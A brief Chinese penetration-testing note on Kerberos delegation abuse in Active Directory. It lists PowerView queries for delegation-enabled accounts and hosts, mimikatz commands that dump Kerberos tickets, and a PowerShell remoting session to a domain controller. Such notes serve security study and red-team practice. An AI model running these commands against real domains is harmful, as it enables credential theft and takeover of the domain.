账户委派
账户非受限委派
设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F398.png&width=768&dpr=4&quality=100&sign=38fb90ab&sv=1)
查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F399.png&width=768&dpr=4&quality=100&sign=b3627932&sv=1)
利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F400.png&width=768&dpr=4&quality=100&sign=90df0ee3&sv=1)
清空票据,导入票据
获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F403.png&width=768&dpr=4&quality=100&sign=3734665c&sv=1)
账户受限委派
查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com
查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com
利用方法后见权限维持模块
最后更新于